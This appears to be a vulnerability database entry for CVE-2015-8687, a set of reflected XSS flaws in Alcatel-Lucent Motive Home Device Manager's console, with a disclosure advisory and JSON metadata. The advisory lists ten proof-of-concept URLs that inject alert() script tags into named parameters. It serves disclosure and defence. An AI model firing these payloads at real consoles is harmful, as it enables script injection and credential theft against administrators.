VAR-201703-0219

Vulnerability from variot - Updated: 2023-12-18 13:44

Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do.

Alcatel-Lucent Home Device Manager is a device manager that helps manage and control home network devices through the help desk. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Disclosure Timeline:

  10 Dec 2015: Vendor returned; investigating
  16 Dec 2015: Vendor has validated the issues & fixed
  27 Dec 2015: CVE number assigned
  03 Jan 2016: Disclosed

Affected Product(s):

Alcatel Lucent Home Device Manager - Management Console 4.1.10.5; older versions may also be affected

Exploitation Technique:

Local, Authenticated

Severity Level:

High

Technical Details & Description:

Sample Payload: 42f8b36<script>alert(1)<%2fscript>152b4

Affected Path/Parameter: [10 parameters]

  1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]
     http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36<script>alert(1)<%2fscript>152b4

  2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]
     http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31"><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0

  3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]
     http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3"><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0

  4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]
     http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b<script>alert(1)<%2fscript>1a032

  5. /hdm/ajax.do [operation parameter]
     http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81<script>alert(1)<%2fscript>238957ca4e0&deviceId=8001

  6. /hdm/device/editDevice.do [deviceID parameter]
     http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5<script>alert(1)<%2fscript>45f4a

  7. /hdm/policy/findPolicies.do [policyAction parameter]
     http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01"><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all

  8. /hdm/policy/findPolicies.do [policyClass parameter]
     http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb"><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all

  9. /hdm/policy/findPolicies.do [policyName parameter]
     http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd"><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all

  10. /hdm/xmlHttp.do [operation parameter]
      http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c<script>alert(1)<%2fscript>217f045ae1f&deviceID=8001

Proof of Concept (PoC):

POC Video: https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing

Solution Fix & Patch:

Fixed in version 4.2

Security Risk:

The risk of the vulnerability above is estimated as high.

Credits & Authors:

Ugur Cihan Koc (@_uceka_)
Blog: www.uceka.com


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201703-0219",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "motive home device manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "alcatel lucent",
        "version": "4.1.10.5"
      },
      {
        "model": "home device manager",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "alcatel lucent",
        "version": "4.1.10.5"
      },
      {
        "model": "motive home device manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "alcatel lucent",
        "version": "4.2"
      },
      {
        "model": "motive home device manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "alcatel lucent",
        "version": "4.1.10.5"
      },
      {
        "model": "home device manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "alcatel lucent",
        "version": "4.2"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "BID",
        "id": "79864"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:alcatel-lucent:motive_home_device_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.1.10.5",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ugur Cihan Koc",
    "sources": [
      {
        "db": "BID",
        "id": "79864"
      },
      {
        "db": "PACKETSTORM",
        "id": "135133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2015-8687",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 3.5,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-8687",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2016-00356",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.3,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.4,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2015-8687",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-8687",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-00356",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201601-316",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do. (1) DeviceType/getDeviceType.do of deviceTypeID Parameters (2) policyActionClass (3) PolicyAction/findPolicyActions.do of policyActionName Parameter or deviceID Parameters (4) SingleDeviceMgmt/getDevice.do (5) device/editDevice.do Operating parameters (6) ajax.do (7) xmlHttp.do (8) policyAction (9) policyClass (10) policy/findPolicies.do of policyName Parameters. Alcatel-LucentHomeDeviceManager is a device manager that helps manage and control home network devices through the help desk. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
\n10 Dec 2015    Vendor returned ; investigating\n16 Dec 2015    Vendor has validated the issues \u0026 fixed\n27 Dec 2015   CVE number assigned\n03 Jan 2016    Disclosured\n\nAffected Product(s):\n====================\nAlcatel Lucent Home Device Manager - Management Console 4.1.10.5\nmay be old version could be affected\n\nExploitation Technique:\n=======================\nLocal, Authenticated\n\nSeverity Level:\n===============\nHigh\n\nTechnical Details \u0026 Description:\n================================\n\u00d8  Sample Payload : 42f8b36\u003cscript\u003ealert(1)\u003c%2fscript\u003e152b4\n\n\u00d8  Affected Path/Parameter: [10 parameter]\n\n1.     /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]\no\nhttp://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e152b4\n\n2.     /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]\no\nhttp://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1\u0026policyActionName=\u0026policyActionClass=c9e31\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e3bd174ff207\u0026policyActionFunction=0\n\n3.     /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]\no\nhttp://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1\u0026policyActionName=553a3\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e721d335792b\u0026policyActionClass=\u0026policyActionFunction=0\n\n4.     /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]\no\nhttp://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e1a032\n\n5.     /hdm/ajax.do [operation parameter]\no    http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e238957ca4e0\u0026deviceId=8001\n\n6.     
/hdm/device/editDevice.do [deviceID parameter]\no    http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e45f4a\n\n7.     /hdm/policy/findPolicies.do [policyAction parameter]\no\nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1\u0026policyName=\u0026policyAction=19f01\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003eb37ee8333eb\u0026policyClass=\u0026policyStatus=\u0026trigger=trigger_all\n\n8.     /hdm/policy/findPolicies.do [policyClass parameter]\no\nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1\u0026policyName=\u0026policyAction=\u0026policyClass=c77cb\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e5ddc63ced2e\u0026policyStatus=\u0026trigger=trigger_all\n\n9.     /hdm/policy/findPolicies.do [policyName parameter]\no\nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1\u0026policyName=654dd\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e5b8329ee237\u0026policyAction=\u0026policyClass=\u0026policyStatus=\u0026trigger=trigger_all\n\n10.  /hdm/xmlHttp.do [operation parameter]\no\nhttp://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e217f045ae1f\u0026deviceID=8001\n\n\n\nProof of Concept (PoC):\n=======================\nPOC Video;\nhttps://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing\n\nSolution Fix \u0026 Patch:\n====================\nFixed version of 4.2\n\nSecurity Risk:\n==============\nThe risk of the vulnerability above estimated as high. \n\nCredits \u0026 Authors:\n==================\nUgur Cihan Koc(@_uceka_)\nBlog: www.uceka.com\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "BID",
        "id": "79864"
      },
      {
        "db": "PACKETSTORM",
        "id": "135133"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-8687",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "79864",
        "trust": 1.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "135133",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "BID",
        "id": "79864"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "PACKETSTORM",
        "id": "135133"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "id": "VAR-201703-0219",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:44:09.679000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://networks.nokia.com/"
      },
      {
        "title": "Patch for Alcatel-LucentHomeDeviceManager Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/70289"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://seclists.org/fulldisclosure/2016/jan/0"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/79864"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8687"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8687"
      },
      {
        "trust": 0.3,
        "url": "http://www.alcatel-lucent.com/"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/devicetype/getdevicetype.do?devicetypeid=42f8b36"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/device/editdevice.do?deviceid=8001c94e5"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1\u0026policyactionname=\u0026policyactionclass=c9e31"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/xmlhttp.do?operation=getqueuedactionsd4b0c"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/singledevicemgmt/getdevice.do?deviceid=8001a1a0b"
      },
      {
        "trust": 0.1,
        "url": "https://www.uceka.com"
      },
      {
        "trust": 0.1,
        "url": "https://drive.google.com/file/d/0b-lwhbwdk3p9y3uyznfmzjjqa1u/view?usp=sharing"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1\u0026policyname=\u0026policyaction=\u0026policyclass=c77cb"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1\u0026policyname=\u0026policyaction=19f01"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/ajax.do?operation=getdevicebyid0fa81"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1\u0026policyname=654dd"
      },
      {
        "trust": 0.1,
        "url": "http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1\u0026policyactionname=553a3"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "BID",
        "id": "79864"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "PACKETSTORM",
        "id": "135133"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "db": "BID",
        "id": "79864"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "db": "PACKETSTORM",
        "id": "135133"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-01-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "date": "2016-01-03T00:00:00",
        "db": "BID",
        "id": "79864"
      },
      {
        "date": "2017-04-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "date": "2016-01-05T13:13:13",
        "db": "PACKETSTORM",
        "id": "135133"
      },
      {
        "date": "2017-03-23T20:59:00.733000",
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "date": "2016-01-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-01-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-00356"
      },
      {
        "date": "2016-01-03T00:00:00",
        "db": "BID",
        "id": "79864"
      },
      {
        "date": "2017-04-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      },
      {
        "date": "2017-03-28T13:47:49.650000",
        "db": "NVD",
        "id": "CVE-2015-8687"
      },
      {
        "date": "2017-03-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Alcatel-Lucent Motive Home Device Manager of  Management Console Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007437"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "135133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-316"
      }
    ],
    "trust": 0.7
  }
}

